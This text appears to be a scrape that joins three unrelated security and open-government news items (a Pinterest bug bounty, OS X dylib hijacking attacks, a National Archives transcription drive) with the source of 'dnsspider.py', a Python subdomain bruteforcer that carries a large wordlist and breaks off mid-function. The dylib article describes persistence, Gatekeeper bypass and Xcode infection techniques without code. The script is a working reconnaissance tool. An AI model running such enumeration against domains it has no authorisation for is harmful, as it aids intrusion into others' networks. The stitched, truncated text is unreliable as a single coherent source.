was updated at noon ET with clarifications throughout. Source

Pinterest’s journey toward becoming a fully HTTPS website opened a lot of doors, including a potentially profitable one for hackers. The social networking site this week announced that it would begin paying cash rewards through its bug bounty program, upping the stakes from the T-shirt it originally offered last May when it kicked off the Bugcrowd-hosted initiative. The news complements Pinterest’s full adoption of encrypted communication and traffic from its website. “I feel HTTPS will soon be seen as a requirement for anyone doing business online,” said Paul Moreno, security engineering lead on Pinterest’s cloud team. Pinterest spells out the scope of its bounty program on its Bugcrowd page. The company said it will start paying between $25 and $200 for vulnerabilities found on a number of Pinterest properties, including its developer site, iOS and Android mobile applications, API, and ads pages among others. “We have a strong experimentation culture and we feel that HTTPS foundation provides the minimal baseline for us to get higher value bugs,” Moreno told Threatpost. “We are experimenting with the paid approach for these community sourced higher value bugs and will evaluate the program periodically.” Many high-value Internet properties have moved to HTTPS in the wake of the Snowden revelations. The continuous flow of leaked documents demonstrating the breadth of government surveillance and collection of personal data has accelerated a number of tech companies’ migrations to HTTPS. Moreno said that Pinterest’s move to HTTPS, however, was not without its challenges. Standing out among them was the site’s working relationships with content delivery networks (CDNs) that support HTTPS and Pinterest’s digital certificates. Other expected challenges, Moreno said, were some marginal performance issues, older browser support, mixed content warnings, and referral header removal from HTTPS to HTTP sites. Once a test was rolled out to its large Pinner community in the U.K., Moreno said some unexpected issues cropped up including CDN content that broke the site’s Pin It functionality and some sitemap files that were not updated to point to HTTPS domains. Those were addressed respectively by orchestrating a DNS change to a new CDN provider, and the implementation of a meta referrer header to support HTTPS tracking to HTTP sites. “In addition, having multiple CDN providers that supported HTTPS gave us options for performance as well as commercial leverage,” Moreno said in a blogpost announcing the move. “In the end, we enhanced the privacy of Pinners by enabling encryption while also hindering exploitation by way of man-in-the-middle attacks, session hijacking, content injection, etc. This also paved the way for future products that may require HTTPS to launch,” Moreno said. Source

DLL hijacking has plagued Windows machines back as far as 2000 and provides hackers with a quiet way to gain persistence on a vulnerable machine, or remotely exploit a vulnerable application. And now it’s come to Apple’s Mac OS X. This week at the CanSecWest conference in Vancouver, Synack director of research Patrick Wardle is expected to deliver a talk during which he’ll explain different attacks that abuse dylibs in OS X for many of the same outcomes as with Windows: persistence; process injection; security feature bypass (in this case, Apple Gatekeeper); and remote exploitation. “DLL hijacking has haunted Windows for a while; it’s been abused by malware by a number of malicious adversaries. It’s a fairly widespread attack,” Wardle told Threatpost. “I wondered if it was similar on OS X and I found an attack similar to that. Under the hood, there are technical differences, but it provides the same capabilities. Given you have a vulnerable app on OS X, you can abuse it the same way it’s abused on Windows.” Wardle is also expected to release following his talk source code for a scanner that discovers apps that are vulnerable to his attack. Running his Python script against his own OS X machine, Wardle was able to find 144 binaries vulnerable to different flavors of his dylib hijacking attacks, including Apple’s Xcode, iMovie and Quicktime plugins, Microsoft Word, Excel, and PowerPoint, and third-party apps such as Java, Dropbox, GPG Tools and Adobe plugins. “Windows is vulnerable to DLL hijacking, and now OS X is similarly vulnerable to dylib hijacking,” Wardle said. With DLL and dylib attacks, the concept is essentially the same: an attacker must find a way to get a malicious library into a directory that is loaded by the operating system. Wardle explained one facet of his attack where he was able to find a vulnerable Apply binary in its Photostream Agent that automatically started with iCloud. “It’s perfect for attacker persistence,” Wardle said. “You copy a specially crafted dylib into the directory PhotoStream looks for when the app starts, and the attacker’s dylib is loaded into the context of the process. It’s a stealthy way to gain persistence; you’re not creating any new processes, nor modifying any files. You’re planting a single dylib and you’re in.” In another attack, Wardle said he was able to gain automatic and persistent code execution via a process injection against Xcode, Apple’s integrated developer environment. “My malware infects Xcode and any time a developer deploys a new binary, it would also add the malicious code,” Wardle said. “It’s an anonymous propagation vector.” Wardle was also able to remotely bypass Apple’s Gatekeeper security product that limits what software can be downloaded onto an Apple machine and from where, in addition to providing antimalware protection. His malicious dylib code, he said, would be implanted in a download that should be blocked by Gatekeeper because it’s not signed from the Apple App Store. Gatekeeper, however, will load the malicious file remotely giving the attacker code execution, Wardle said. “Gatekeeper normally does a pretty good job of blocking these downloads, but now using this bypass, we can get users to infect themselves,” Wardle said. Wardle is expected to demonstrate an attack that combines all of these components, including the Gatekeeper bypass that when executed uses the dylib hijacking to gain persistence, grabs users’ files and exfiltrates that data to iCloud, and can also sent remote commands to the vulnerable machine. Most worrisome, he said, is that his malware went undetected by most antivirus packages, and Apple barely acknowledged his bug reports starting in January other than an automated response, and a thank you and congratulations on his talk being accepted at CanSecWest. “I think things are broken. This abuses legitimate functionality of OS X and it’s not patched,” Wardle said. “These attacks are powerful and stealthy, and do a lot of malicious things.” Source

Tearing a page, so to speak, from social media crowdfunding campaigns like last year's ALS Ice Bucket Challenge, the National Archives has turned to Twitter to raise a volunteer workforce of citizen archivists to help transcribe some of millions of digitized documents—including thousands of declassified CIA and Department of Defense files. The goal of the Transcription Challenge: 1,000 transcribed pages of documents by March 23. The Transcription Challenge corresponds with Sunshine Week, an open government campaign originally launched by the Florida Society of Newspaper Editors as Sunshine Sunday in 2002. The event was adopted by the American Society of Newspaper Editors and extended to a week in 2003, and it has since picked up support from the Reporters Committee for the Freedom of the Press, Bloomberg, The Gridiron Club, and the John S. and James L. Knight Foundation. The National Archives is looking for individuals interested in helping to use Twitter and the hashtag #1000pages to claim documents for transcription and tell the Archives' staff what they've found. In addition to CIA and other declassified files, the Archives is offering up a number of other "missions," ranging from National Forest documents and photos to papers of the Continental Congress and records of the Confederate Government. There are also audio recordings of interviews conducted by the 9/11 commission. Source

#!/usr/bin/env python2 # -*- coding: latin-1 -*- ###################################################### # ____ _ __ # # ___ __ __/ / /__ ___ ______ ______(_) /___ __ # # / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / # # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / # # /___/ team # # # # dnsspider.py - multithreaded subdomain bruteforcer # # # # DATE # # 08/16/2012 # # # # DESCRIPTION # # A very fast multithreaded bruteforcer of subdomains that leverages a # # wordlist and/or character permutation. # # # # AUTHOR # # noptrix - http://www.nullsecurity.net/ # # # # NOTES: # # quick'n'dirty code # # # # TODO: # # - attack while mutating -> don't generate whole list when using -t 1 # # # # CHANGELOG: # # v0.6 # # - upgraded default wordlist # # - replaced optionparser with argparse # # - add version output option # # - fixed typo # # # # v0.5 # # - fixed extracted ip addresses from rrset answers # # - renamed file (removed version string) # # - removed trailing whitespaces # # - removed color output # # - changed banner # # # # v0.4 # # - fixed a bug for returned list # # - added postfix option # # - upgraded wordlist[] # # - colorised output # # - changed error messages # # # # v0.3: # # - added verbose/quiet mode - default is quiet now # # - fixed try/catch for domainnames # # - fixed some tab width (i normally use <= 80 chars per line) # # # # v0.2: # # - append DNS and IP output to found list # # - added diffound list for subdomains resolved to different addresses # # - get right ip address from current used iface to avoid socket problems # # - fixed socket exception syntax and output # # - added usage note for fixed port and multithreaded socket exception # # # # v0.1: # # - initial release # ################################################################################ import sys import time import string import itertools import socket import threading import re import argparse try: import dns.message import dns.query except ImportError: print("[-] ERROR: you need 'dnspython' package") sys.exit() BANNER = '--==[ dnsspider by noptrix@nullsecurity.net ]==--' USAGE = '\n\n' \ ' dnsspider.py -t <arg> -a <arg> [options]' VERSION = 'v0.6' defaults = {} hostnames = [] prefix = '' postfix = '' found = [] diffound = [] chars = string.ascii_lowercase digits = string.digits # default wordlist wordlist = [ '0', '01', '02', '03', '1', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '2', '20', '3', '3com', '4', '5', '6', '7', '8', '9', 'ILMI', 'a', 'a.auth-ns', 'a01', 'a02', 'a1', 'a2', 'abc', 'about', 'ac', 'academico', 'acceso', 'access', 'accounting', 'accounts', 'acid', 'activestat', 'ad', 'adam', 'adkit', 'adm', 'admin', 'administracion', 'administrador', 'administrator', 'administrators', 'admins', 'ads', 'adserver', 'adsl', 'ae', 'af', 'affiliate', 'affiliates', 'afiliados', 'ag', 'agenda', 'agent', 'ai', 'aix', 'ajax', 'ak', 'akamai', 'al', 'alabama', 'alaska', 'albuquerque', 'alerts', 'alpha', 'alterwind', 'am', 'amarillo', 'americas', 'an', 'anaheim', 'analyzer', 'announce', 'announcements', 'antivirus', 'ao', 'ap', 'apache', 'apollo', 'app', 'app01', 'app1', 'apple', 'application', 'applications', 'apps', 'appserver', 'aq', 'ar', 'archie', 'arcsight', 'argentina', 'arizona', 'arkansas', 'arlington', 'as', 'as400', 'asia', 'asterix', 'at', 'athena', 'atlanta', 'atlas', 'att', 'au', 'auction', 'austin', 'auth', 'auto', 'autodiscover', 'autorun', 'av', 'aw', 'ayuda', 'az', 'b', 'b.auth-ns', 'b01', 'b02', 'b1', 'b2', 'b2b', 'b2c', 'ba', 'back', 'backend', 'backup', 'backups', 'baker', 'bakersfield', 'balance', 'balancer', 'baltimore', 'banking', 'bayarea', 'bb', 'bbdd', 'bbs', 'bd', 'bdc', 'be', 'bea', 'beta', 'bf', 'bg', 'bh', 'bi', 'bill', 'billing', 'biz', 'biztalk', 'bj', 'black', 'blackberry', 'blog', 'blogs', 'blue', 'bm', 'bn', 'bnc', 'bo', 'board', 'bob', 'bof', 'boise', 'bolsa', 'border', 'boston', 'boulder', 'boy', 'br', 'bravo', 'brazil', 'britian', 'broadcast', 'broker', 'bronze', 'brown', 'bs', 'bsd', 'bsd0', 'bsd01', 'bsd02', 'bsd1', 'bsd2', 'bt', 'bug', 'buggalo', 'bugs', 'bugzilla', 'build', 'bulletins', 'burn', 'burner', 'buscador', 'buy', 'bv', 'bw', 'by', 'bz', 'c', 'c.auth-ns', 'ca', 'cache', 'cafe', 'calendar', 'california', 'call', 'calvin', 'canada', 'canal', 'canon', 'careers', 'cart', 'catalog', 'cc', 'cd', 'cdburner', 'cdn', 'central', 'cert', 'certificates', 'certify', 'certserv', 'certsrv', 'cf', 'cg', 'cgi', 'ch', 'channel', 'channels', 'charlie', 'charlotte', 'chat', 'chats', 'chatserver', 'check', 'checkpoint', 'chi', 'chicago', 'ci', 'cims', 'cincinnati', 'cisco', 'citrix', 'ck', 'cl', 'class', 'classes', 'classifieds', 'classroom', 'cleveland', 'cli', 'clicktrack', 'client', 'clientes', 'clients', 'club', 'clubs', 'cluster', 'clusters', 'cm', 'cmail', 'cms', 'cn', 'co', 'cocoa', 'code', 'coldfusion', 'colombus', 'colorado', 'columbus', 'com', 'commerce', 'commerceserver', 'communigate', 'community', 'compaq', 'compras', 'con', 'concentrator', 'conf', 'conference', 'conferencing', 'confidential', 'connect', 'connecticut', 'consola', 'console', 'consult', 'consultant', 'consultants', 'consulting', 'consumer', 'contact', 'content', 'contracts', 'control', 'controller', 'core', 'core0', 'core01', 'corp', 'corpmail', 'corporate', 'correo', 'correoweb', 'cortafuegos', 'counterstrike', 'courses', 'cr', 'cricket', 'crm', 'crs', 'cs', 'cso', 'css', 'ct', 'cu', 'cust1', 'cust10', 'cust100', 'cust101', 'cust102', 'customer', 'customers', 'cv', 'cvs', 'cx', 'cy', 'cz', 'd', 'dallas', 'data', 'database', 'database01', 'database02', 'database1', 'database2', 'databases', 'datastore', 'datos', 'david', 'db', 'db0', 'db01', 'db02', 'db1', 'db2', 'dc', 'de', 'dealers', 'dec', 'def', 'default', 'defiant', 'delaware', 'dell', 'delta', 'delta1', 'demo', 'demonstration', 'demos', 'denver', 'depot', 'des', 'desarrollo', 'descargas', 'design', 'designer', 'desktop', 'detroit', 'dev', 'dev0', 'dev01', 'dev1', 'devel', 'develop', 'developer', 'developers', 'development', 'device', 'devserver', 'devsql', 'dhcp', 'dial', 'dialup', 'digital', 'dilbert', 'dir', 'direct', 'directory', 'disc', 'discovery', 'discuss', 'discussion', 'discussions', 'disk', 'disney', 'distributer', 'distributers', 'dj', 'dk', 'dm', 'dmail', 'dmz', 'dnews', 'dns', 'dns-2', 'dns0', 'dns1', 'dns2', 'dns3', 'do', 'doc', 'docs', 'document', 'documentacion', 'documentos', 'domain', 'domains', 'dominio', 'domino', 'dominoweb', 'doom', 'download', 'downloads', 'downtown', 'dragon', 'drupal', 'dsl', 'dyn', 'dynamic', 'dynip', 'dz', 'e', 'e-com', 'e-commerce', 'e0', 'eaccess', 'eagle', 'earth', 'east', 'ec', 'echo', 'ecom', 'ecommerce', 'edi', 'edu', 'education', 'edward', 'ee', 'eg', 'eh', 'ejemplo', 'elpaso', 'email', 'employees', 'empresa', 'empresas', 'en', 'enable', 'eng', 'eng01', 'eng1', 'engine', 'engineer', 'engineering', 'enterprise', 'epsilon', 'er', 'erp', 'es', 'esd', 'esm', 'espanol', 'estadisticas', 'esx', 'et', 'eta', 'europe', 'events', 'example', 'examples', 'exchange', 'exec', 'exit', 'ext', 'extern', 'external', 'extranet', 'f', 'f5', 'falcon', 'farm', 'faststats', 'fax', 'feedback', 'feeds', 'fi', 'field', 'file', 'files', 'fileserv', 'fileserver', 'filestore', 'filter', 'finance', 'find', 'finger', 'firewall', 'fix', 'fixes', 'fj', 'fk', 'fl', 'flash', 'florida', 'flow', 'fm', 'fo', 'foobar', 'formacion', 'foro', 'foros', 'fortworth', 'forum', 'forums', 'foto', 'fotos', 'foundry', 'fox', 'foxtrot', 'fr', 'france', 'frank', 'fred', 'freebsd', 'freebsd0', 'freebsd01', 'freebsd02', 'freebsd1', 'freebsd2', 'freeware', 'fresno', 'front', 'frontdesk', 'fs', 'fsp', 'ftp', 'ftp-', 'ftp0', 'ftp2', 'ftpserver', 'fw', 'fw-1', 'fw1', 'fwsm', 'fwsm0', 'fwsm01', 'fwsm1', 'g', 'ga', 'galeria', 'galerias', 'galleries', 'gallery', 'games', 'gamma', 'gandalf', 'gate', 'gatekeeper', 'gateway', 'gauss', 'gd', 'ge', 'gemini', 'general', 'george', 'georgia', 'germany', 'gf', 'gg', 'gh', 'gi', 'git', 'gl', 'glendale', 'gm', 'gmail', 'gn', 'go', 'gold', 'goldmine', 'golf', 'gopher', 'gp', 'gq', 'gr', 'green', 'group', 'groups', 'groupwise', 'gs', 'gsx', 'gt', 'gu', 'guest', 'gw', 'gw1', 'gy', 'h', 'hal', 'halflife', 'hawaii', 'hello', 'help', 'helpdesk', 'helponline', 'henry', 'hermes', 'hi', 'hidden', 'hk', 'hm', 'hn', 'hobbes', 'hollywood', 'home', 'homebase', 'homer', 'honeypot', 'honolulu', 'host', 'host1', 'host3', 'host4', 'host5', 'hotel', 'hotjobs', 'houstin', 'houston', 'howto', 'hp', 'hpc', 'hpov', 'hr', 'ht', 'http', 'https', 'hu', 'hub', 'humanresources', 'i', 'ia', 'ias', 'ibm', 'ibmdb', 'id', 'ida', 'idaho', 'ids', 'ie', 'iis', 'il', 'illinois', 'im', 'image', 'images', 'imail', 'imap', 'imap4', 'img', 'img0', 'img01', 'img02', 'imgs', 'in', 'inbound', 'inc', 'include', 'incoming', 'india', 'indiana', 'indianapolis', 'info', 'informix', 'inside', 'install', 'int', 'interface', 'intern', 'internal', 'international', 'internet', 'intl', 'intranet', 'invalid', 'investor', 'investors', 'io', 'iota', 'iowa', 'ip6', 'iplanet', 'ipmonitor', 'ipsec', 'ipsec-gw', 'ipv6', 'iq', 'ir', 'irc', 'ircd', 'ircserver', 'ireland', 'iris', 'irvine', 'irving', 'is', 'isa', 'isaserv', 'isaserver', 'ism', 'israel', 'isync', 'it', 'italy', 'ix', 'j', 'jabber', 'japan', 'java', 'jboss', 'je', 'jedi', 'jm', 'jo', 'jobs', 'john', 'jp', 'jrun', 'juegos', 'juliet', 'juliette', 'juniper', 'jupiter', 'k', 'kansas', 'kansascity', 'kappa', 'kb', 'ke', 'kentucky', 'kerberos', 'keynote', 'kg', 'kh', 'ki', 'kilo', 'king', 'km', 'kn', 'knowledgebase', 'knoxville', 'koe', 'korea', 'kp', 'kr', 'ks', 'kw', 'ky', 'kz', 'l', 'la', 'lab', 'laboratory', 'labs', 'lambda', 'lan', 'laptop', 'laserjet', 'lasvegas', 'launch', 'lb', 'lc', 'ldap', 'legal', 'leo', 'li', 'lib', 'library', 'lima', 'lincoln', 'link', 'linux', 'linux0', 'linux01', 'linux02', 'linux1', 'linux2', 'lista', 'lists', 'listserv', 'listserver', 'live', 'lk', 'load', 'loadbalancer', 'local', 'localhost', 'log', 'log0', 'log01', 'log02', 'log1', 'log2', 'logfile', 'logfiles', 'logger', 'logging', 'loghost', 'login', 'logs', 'london', 'longbeach', 'losangeles', 'lotus', 'louisiana', 'lr', 'ls', 'lt', 'lu', 'luke', 'lv', 'ly', 'lyris', 'm', 'ma', 'mac', 'mac1', 'mac10', 'mac11', 'mac2', 'mac3', 'mac4', 'mac5', 'mach', 'macintosh', 'madrid', 'mail', 'mail2', 'mailer', 'mailgate', 'mailhost', 'mailing', 'maillist', 'maillists', 'mailroom', 'mailserv', 'mailsite', 'mailsrv', 'main', 'maine', 'maint', 'mall', 'manage', 'management', 'manager', 'managers', 'manufacturing', 'map', 'mapas', 'maps', 'marketing', 'marketplace', 'mars', 'marvin', 'mary', 'maryland', 'massachusetts', 'master', 'max', 'mc', 'mci', 'md', 'mdaemon', 'me', 'media', 'member', 'members', 'memphis', 'mercury', 'merlin', 'messages', 'messenger', 'mg', 'mgmt', 'mh', 'mi', 'miami', 'michigan', 'mickey', 'midwest', 'mike', 'milwaukee', 'minneapolis', 'minnesota', 'mirror', 'mis', 'mississippi', 'missouri', 'mk', 'ml', 'mm', 'mn', 'mngt', 'mo', 'mobile', 'mom', 'monitor', 'monitoring', 'montana', 'moon', 'moscow', 'movies', 'mozart', 'mp', 'mp3', 'mpeg', 'mpg', 'mq', 'mr', 'mrtg', 'ms', 'ms-exchange', 'ms-sql', 'msexchange', 'mssql', 'mssql0', 'mssql01', 'mssql1', 'mt', 'mta', 'mtu', 'mu', 'multimedia', 'music', 'mv', 'mw', 'mx', 'mx01', 'my', 'mysql', 'mysql0', 'mysql01', 'mysql1', 'mz', 'n', 'na', 'name', 'names', 'nameserv', 'nameserver', 'nas', 'nashville', 'nat', 'nc', 'nd', 'nds', 'ne', 'nebraska', 'neptune', 'net', 'netapp', 'netdata', 'netgear', 'netmail', 'netmeeting', 'netscaler', 'netscreen', 'netstats', 'network', 'nevada', 'new', 'newhampshire', 'newjersey', 'newmexico', 'neworleans', 'news', 'newsfeed', 'newsfeeds', 'newsgroups', 'newton', 'newyork', 'newzealand', 'nf', 'ng', 'nh', 'ni', 'nigeria', 'nj', 'nl', 'nm', 'nms', 'nntp', 'no', 'noc', 'node', 'nokia', 'nombres', 'nora', 'north', 'northcarolina', 'northdakota', 'northeast', 'northwest', 'noticias', 'novell', 'november', 'np', 'nr', 'ns', 'ns-', 'ns0', 'ns01', 'ns02', 'ns1', 'ns2', 'ns3', 'ns4', 'ns5', 'nt', 'nt4', 'nt40', 'ntmail', 'ntp', 'ntserver', 'nu', 'null', 'nv', 'ny', 'nz', 'o', 'oakland', 'ocean', 'odin', 'office', 'offices', 'oh', 'ohio', 'ok', 'oklahoma', 'oklahomacity', 'old', 'om', 'omaha', 'omega', 'omicron', 'online', 'ontario', 'op', 'open', 'openbsd', 'openview', 'operations', 'ops', 'ops0', 'ops01', 'ops02', 'ops1', 'ops2', 'opsware', 'or', 'oracle', 'orange', 'order', 'orders', 'oregon', 'orion', 'orlando', 'oscar', 'out', 'outbound', 'outgoing', 'outlook', 'outside', 'ov', 'owa', 'owa01', 'owa02', 'owa1', 'owa2', 'ows', 'oxnard', 'p', 'pa', 'page', 'pager', 'pages', 'paginas', 'papa', 'paris', 'parners', 'partner', 'partners', 'patch', 'patches', 'paul', 'payroll', 'pbx', 'pc', 'pc01', 'pc1', 'pc10', 'pc101', 'pc11', 'pc12', 'pc13', 'pc14', 'pc15', 'pc16', 'pc17', 'pc18', 'pc19', 'pc2', 'pc20', 'pcmail', 'pda', 'pdc', 'pe', 'pegasus', 'pennsylvania', 'peoplesoft', 'personal', 'pf', 'pg', 'pgp', 'ph', 'phi', 'philadelphia', 'phoenix', 'phoeniz', 'phone', 'phones', 'photos', 'phpmyadmin', 'pi', 'pics', 'pictures', 'pink', 'pipex-gw', 'pittsburgh', 'pix', 'pk', 'pki', 'pl', 'plano', 'platinum', 'plesk', 'pluto', 'pm', 'pm1', 'pma', 'pn', 'po', 'policy', 'polls', 'pop', 'pop3', 'portal', 'portals', 'portfolio', 'portland', 'post', 'postales', 'postoffice', 'ppp1', 'ppp10', 'ppp11', 'ppp12', 'ppp13', 'ppp14', 'ppp15', 'ppp16', 'ppp17', 'ppp18', 'ppp19', 'ppp2', 'ppp20', 'ppp21', 'ppp3', 'ppp4', 'ppp5', 'ppp6', 'ppp7', 'ppp8', 'ppp9', 'pptp', 'pr', 'pre', 'prensa', 'press', 'printer', 'printserv', 'printserver', 'priv', 'privacy', 'private', 'problemtracker', 'products', 'profiles', 'project', 'projects', 'promo', 'proxy', 'prueba', 'pruebas', 'ps', 'psi', 'pss', 'pt', 'pub', 'public', 'pubs', 'purple', 'pw', 'py', 'q', 'qa', 'qmail', 'qotd', 'quake', 'quebec', 'queen', 'quotes', 'r', 'r01', 'r02', 'r1', 'r2', 'ra', 'rack', 'radio', 'radius', 'rapidsite', 'raptor', 'ras', 'rc', 'rcs', 'rd', 're', 'read', 'realserver', 'recruiting', 'red', 'redhat', 'ref', 'reference', 'reg', 'register', 'registro', 'registry', 'regs', 'relay', 'release', 'rem', 'remote', 'remstats', 'report', 'reports', 'research', 'reseller', 'reserved', 'resumenes', 'rho', 'rhodeisland', 'ri', 'ris', 'rmi', 'ro', 'robert', 'romeo', 'root', 'rose', 'route', 'router', 'router1', 'rs', 'rss', 'rtelnet', 'rtr', 'rtr01', 'rtr1', 'ru', 'rune', 'rw', 'rwhois', 's', 's1', 's2', 'sa', 'sac', 'sacramento', 'sadmin', 'safe', 'sales', 'saltlake', 'sam', 'san', 'sanantonio', 'sandiego', 'sanfrancisco', 'sanjose', 'saskatchewan', 'saturn', 'sb', 'sbs', 'sc', 'scanner', 'schedules', 'scotland', 'scotty', 'sd', 'se', 'search', 'seattle', 'sec', 'secret', 'secure', 'secured', 'securid', 'security', 'sendmail', 'seri', 'serv', 'serv2', 'server', 'server1', 'servers', 'service', 'services', 'servicio', 'servidor', 'setup', 'sg', 'sh', 'share', 'shared', 'sharepoint', 'shares', 'shareware', 'shipping', 'shop', 'shoppers', 'shopping', 'si', 'siebel', 'sierra', 'sigma', 'signin', 'signup', 'silver', 'sim', 'sirius', 'site', 'sj', 'sk', 'skywalker', 'sl', 'slackware', 'slmail', 'sm', 'smc', 'sms', 'smtp', 'smtphost', 'sn', 'sniffer', 'snmp', 'snmpd', 'snoopy', 'snort', 'so', 'socal', 'software', 'sol', 'solaris', 'solutions', 'soporte', 'source', 'sourcecode', 'sourcesafe', 'south', 'southcarolina', 'southdakota', 'southeast', 'southwest', 'spain', 'spam', 'spider', 'spiderman', 'splunk', 'spock', 'spokane', 'springfield', 'sprint', 'sqa', 'sql', 'sql0', 'sql01', 'sql1', 'sql7', 'sqlserver', 'squid', 'squirrel', 'squirrelmail', 'sr', 'srv', 'ss', 'ssh', 'ssl', 'ssl0', 'ssl01', 'ssl1', 'st', 'staff', 'stage', 'stage1', 'staging', 'start', 'stat', 'static', 'statistics', 'stats', 'stlouis', 'stock', 'storage', 'store', 'storefront', 'streaming', 'stronghold', 'strongmail', 'studio', 'submit', 'subversion', 'sun', 'sun0', 'sun01', 'sun02', 'sun1', 'sun2', 'superman', 'supplier', 'suppliers', 'support', 'sv', 'svn', 'sw', 'sw0', 'sw01', 'sw1', 'sweden', 'switch', 'switzerland', 'sy', 'sybase', 'sydney', 'sysadmin', 'sysback', 'syslog', 'syslogs', 'system', 'sz', 't', 'tacoma', 'taiwan', 'talk', 'tampa', 'tango', 'tau', 'tc', 'tcl', 'td', 'team', 'tech', 'technology', 'techsupport', 'telephone', 'telephony', 'telnet', 'temp', 'tennessee', 'terminal', 'terminalserver', 'termserv', 'test', 'test2k', 'testbed', 'testing', 'testlab', 'testlinux', 'tests', 'testserver', 'testsite', 'testsql', 'testxp', 'texas', 'tf', 'tftp', 'tg', 'th', 'thailand', 'theta', 'thor', 'tienda', 'tiger', 'time', 'titan', 'tivoli', 'tj', 'tk', 'tm', 'tn', 'to', 'tokyo', 'toledo', 'tom', 'tool', 'tools', 'toplayer', 'toronto', 'tour', 'tp', 'tr', 'tracker', 'train', 'training', 'transfers', 'trinidad', 'trinity', 'ts', 'ts1', 'tt', 'tucson', 'tulsa', 'tunnel', 'tv', 'tw', 'tx', 'tz', 'u', 'ua', 'uddi', 'ug', 'uk', 'um', 'uniform', 'union', 'unitedkingdom', 'unitedstates', 'unix', 'unixware', 'update', 'updates', 'upload', 'uploads', 'ups', 'upsilon', 'uranus', 'urchin', 'us', 'usa', 'usenet', 'user', 'users', 'ut', 'utah', 'utilities', 'uy', 'uz', 'v', 'va', 'vader', 'vantive', 'vault', 'vc', 've', 'vega', 'vegas', 'vend', 'vendors', 'venus', 'vermont', 'vg', 'vi', 'victor', 'video', 'videos', 'viking', 'violet', 'vip', 'virginia', 'virtual', 'vista', 'vm', 'vmserver', 'vmware', 'vn', 'vnc', 'voice', 'voicemail', 'voip', 'voyager', 'vpn', 'vpn0', 'vpn01', 'vpn02', 'vpn1', 'vpn2', 'vt', 'vu', 'vz', 'w', 'w1', 'w2', 'w3', 'wa', 'wais', 'wallet', 'wam', 'wan', 'wap', 'warehouse', 'washington', 'wc3', 'web', 'webaccess', 'webadmin', 'webalizer', 'webboard', 'webcache', 'webcam', 'webcast', 'webdev', 'webdocs', 'webfarm', 'webhelp', 'weblib', 'weblogic', 'webmail', 'webmaster', 'webmin', 'webproxy', 'webring', 'webs', 'webserv', 'webserver', 'webservices', 'webshop', 'website', 'websites', 'websphere', 'websrv', 'websrvr', 'webstats', 'webstore', 'websvr', 'webtrends', 'welcome', 'west', 'westvirginia', 'wf', 'whiskey', 'white', 'whois', 'wi', 'wichita', 'wiki', 'wililiam', 'win', 'win01', 'win02', 'win1', 'win2', 'win2000', 'win2003', 'win2k', 'win2k3', 'windows', 'windows01', 'windows02', 'windows1', 'windows2', 'windows2000', 'windows2003', 'windowsxp', 'wingate', 'winnt', 'winproxy', 'wins', 'winserve', 'winxp', 'wire', 'wireless', 'wisconsin', 'wlan', 'wordpress', 'work', 'workstation', 'world', 'wpad', 'write', 'ws', 'ws1', 'ws10', 'ws11', 'ws12', 'ws13', 'ws2', 'ws3', 'ws4', 'ws5', 'ws6', 'ws7', 'ws8', 'ws9', 'wusage', 'wv', 'ww', 'www', 'www-', 'www-01', 'www-02', 'www-1', 'www-2', 'www-int', 'www0', 'www01', 'www02', 'www1', 'www2', 'www3', 'wwwchat', 'wwwdev', 'wwwmail', 'wy', 'wyoming', 'x', 'x-ray', 'xi', 'xlogan', 'xmail', 'xml', 'xp', 'y', 'yankee', 'ye', 'yellow', 'young', 'yt', 'yu', 'z', 'z-log', 'za', 'zebra', 'zera', 'zeus', 'zlog', 'zm', 'zulu', 'zw' ] def usage(): print('\n' + USAGE) sys.exit() return def check_usage(): if len(sys.argv) == 1: print('[!] WARNING: use -H for help and usage') sys.exit() return def get_default_nameserver(): print('[+] getting default nameserver') lines = list(open('/etc/resolv.conf', 'r')) for line in lines: line = string.strip(line) if not line or line[0] == ';' or line[0] == '#': continue fields = string.split(line) if len(fields) < 2: continue if fields[0] == 'nameserver': defaults['nameserver'] = fields[1] return defaults def get_default_source_ip(): print('[+] getting default ip address') try: # get current used iface enstablishing temp socket ipsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ipsocket.connect(("gmail.com", 80)) defaults['ipaddr'] = ipsocket.getsockname()[0] print('[+] found currently used interface ip ' + "'" + defaults['ipaddr'] + "'") ipsocket.close() except: print(''' [!] WARNING: can\'t get your ip-address, use "-i" option and define yourself''') return defaults def parse_cmdline(): p = argparse.ArgumentParser(usage=USAGE, add_help=False) p.add_argument( '-t', metavar='<type>', dest='type', help='attack type (0 for dictionary 1 for bruteforce)' ) p.add_argument( '-a', metavar='<domain>', dest='domain', help='subdomain to bruteforce' ) p.add_argument( '-l', metavar='<wordlist>', dest='wordlist', help='wordlist, one hostname per line (default: predefined in code)' ) p.add_argument( '-d', metavar='<nameserver>', dest='dnshost', help="choose another nameserver (default: your system's)" ) p.add_argument( '-i', metavar='<ipaddr>', dest='ipaddr', help="source ip address to use (default: your system's)" ) p.add_argument( '-p', metavar='<port>', dest='port', default=0, help='source port to use (default: 0 --> first free random port)' ) p.add_argument( '-u', metavar='<protocol>', dest='protocol', default='udp', help='speak via udp or tcp (default: udp)' ) p.add_argument( '-c', metavar='<charset>', dest='charset', default=0, help='choose charset 0 [a-z0-9], 1 [a-z] or 2 [0-9] (default: 0)' ) p.add_argument( '-m', metavar='<maxchar>', dest='max', default=2, help='max chars to bruteforce (default: 2)' ) p.add_argument( '-s', metavar='<prefix>', dest='prefix', help="prefix for bruteforce, e.g. 'www'" ) p.add_argument( '-g', metavar='<postfix>', dest='postfix', help="postfix for bruteforce, e.g. 'www'" ) p.add_argument( '-o', metavar='<sec>', dest='timeout', default=3, help='timeout (default: 3)' ) p.add_argument( '-v', action='store_true', dest='verbose', help='verbose mode - prints every attempt (default: quiet)' ) p.add_argument( '-w', metavar='<sec>', dest='wait', default=0, help='seconds to wait for next request (default: 0)' ) p.add_argument( '-x', metavar='<num>', dest='threads', default=32, help='number of threads to use (default: 32) - choose more ' ) p.add_argument( '-r', metavar='<logfile>', dest='logfile', default='stdout', help='write found subdomains to file (default: stdout)' ) p.add_argument( '-V', action='version', version='%(prog)s ' + VERSION, help='print version information' ) p.add_argument( '-H', action='help', help='print this help' ) return(p.parse_args()) def check_cmdline(opts): if not opts.type or not opts.domain: print('[-] ERROR: mount /dev/brain') sys.exit() return def set_opts(defaults, opts): if not opts.dnshost: opts.dnshost = defaults['nameserver'] if not opts.ipaddr: opts.ipaddr = defaults['ipaddr'] if 